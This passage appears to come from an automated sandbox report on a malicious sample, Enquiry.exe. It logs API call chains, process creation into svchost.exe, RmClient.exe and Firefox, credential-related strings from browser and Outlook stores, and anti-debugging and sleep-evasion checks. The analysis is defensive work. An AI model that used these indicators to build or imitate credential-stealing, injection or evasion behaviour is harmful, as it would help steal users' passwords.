            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0046CB5F
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\Enquiry.exeFile created: C:\Users\user\AppData\Local\Temp\CounteeJump to behavior
            Source: Enquiry.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Enquiry.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RmClient.exe, 00000006.00000002.3533246555.00000000034F0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2179145029.00000000034F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Enquiry.exeReversingLabs: Detection: 63%
            Source: Enquiry.exeVirustotal: Detection: 67%
            Source: C:\Users\user\Desktop\Enquiry.exeFile read: C:\Users\user\Desktop\Enquiry.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Enquiry.exe "C:\Users\user\Desktop\Enquiry.exe"
            Source: C:\Users\user\Desktop\Enquiry.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Enquiry.exe"
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
            Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Enquiry.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Enquiry.exe"Jump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\RmClient.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Enquiry.exeStatic file information: File size 1350779 > 1048576
            Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000001.00000002.1996829144.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996930488.000000000081A000.00000004.00000020.00020000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000003.00000002.3533614188.000000000128E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lOHjHqJCgqObv.exe, 00000003.00000000.1858505169.000000000024E000.00000002.00000001.01000000.00000005.sdmp, lOHjHqJCgqObv.exe, 00000007.00000002.3532849738.000000000024E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Enquiry.exe, 00000000.00000003.1724018113.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Enquiry.exe, 00000000.00000003.1724629385.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1837790839.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1997322740.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1997322740.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1835138164.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3534474954.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1995317971.0000000003713000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3534474954.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1990157845.0000000003561000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Enquiry.exe, 00000000.00000003.1724018113.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Enquiry.exe, 00000000.00000003.1724629385.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1837790839.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1997322740.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1997322740.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1835138164.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000006.00000002.3534474954.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1995317971.0000000003713000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3534474954.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1990157845.0000000003561000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RmClient.exe, 00000006.00000002.3533246555.000000000346D000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3535415896.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000000.2063894014.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2304214880.000000003A9FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000006.00000002.3533246555.000000000346D000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3535415896.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000000.2063894014.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2304214880.000000003A9FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: RmClient.pdb source: svchost.exe, 00000001.00000002.1996829144.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996930488.000000000081A000.00000004.00000020.00020000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000003.00000002.3533614188.000000000128E000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: Enquiry.exeStatic PE information: real checksum: 0xa961f should be: 0x14d4aa
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004033B0 push eax; ret 1_2_004033B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004234C3 push edi; retf 1_2_004234CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401724 push 0000007Ch; iretd 1_2_00401726
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300225F pushad ; ret 1_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030027FA pushad ; ret 1_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx1_2_030309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300283D push eax; iretd 1_2_03002858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300135E push eax; iretd 1_2_03001369
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038C225F pushad ; ret 6_2_038C27F9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038C27FA pushad ; ret 6_2_038C27F9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038F09AD push ecx; mov dword ptr [esp], ecx6_2_038F09B6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038C283D push eax; iretd 6_2_038C2858
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_038C1368 push eax; iretd 6_2_038C1369
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F42260 push ds; retf 6_2_02F42274
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F5038C push ecx; iretd 6_2_02F5038F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F50365 push ebp; ret 6_2_02F50367
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F50110 push edi; retf 6_2_02F5011B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F47338 push ds; ret 6_2_02F4733C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F4B602 pushfd ; ret 6_2_02F4B604
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375C308 push cs; ret 6_2_0375C309
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375F06A push ebp; iretd 6_2_0375F072
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03765052 push eax; ret 6_2_03765054
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_037556F8 pushad ; iretd 6_2_0375573F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375857A push es; retf 6_2_03758584
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_037525EE push ebp; ret 6_2_037525EF
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375BFE5 push cs; retf 6_2_0375BFEF
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03754C7E push 00000021h; retf 6_2_03754C80
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Enquiry.exeAPI/Special instruction interceptor: Address: 413E664
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E rdtsc 1_2_0307096E
            Source: C:\Windows\SysWOW64\RmClient.exeWindow / User API: threadDelayed 9818Jump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-85022
            Source: C:\Users\user\Desktop\Enquiry.exeAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RmClient.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 4996Thread sleep count: 153 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 4996Thread sleep time: -306000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 4996Thread sleep count: 9818 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 4996Thread sleep time: -19636000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe TID: 4304Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe TID: 4304Thread sleep time: -40500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RmClient.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F4C280 FindFirstFileW,FindNextFileW,FindClose,6_2_02F4C280
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: RmClient.exe, 00000006.00000002.3533246555.000000000346D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
            Source: lOHjHqJCgqObv.exe, 00000007.00000002.3533616095.00000000013E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
            Source: firefox.exe, 00000008.00000002.2311132735.0000021BBA99C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E rdtsc 1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417583 LdrLoadDll,1_2_00417583
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0413D2B0 mov eax, dword ptr fs:[00000030h]0_2_0413D2B0
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0413E8D0 mov eax, dword ptr fs:[00000030h]0_2_0413E8D0
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0413E930 mov eax, dword ptr fs:[00000030h]0_2_0413E930
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h]1_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h]1_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov ecx, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h]1_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h]1_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310634F mov eax, dword ptr fs:[00000030h]1_2_0310634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D437C mov eax, dword ptr fs:[00000030h]1_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
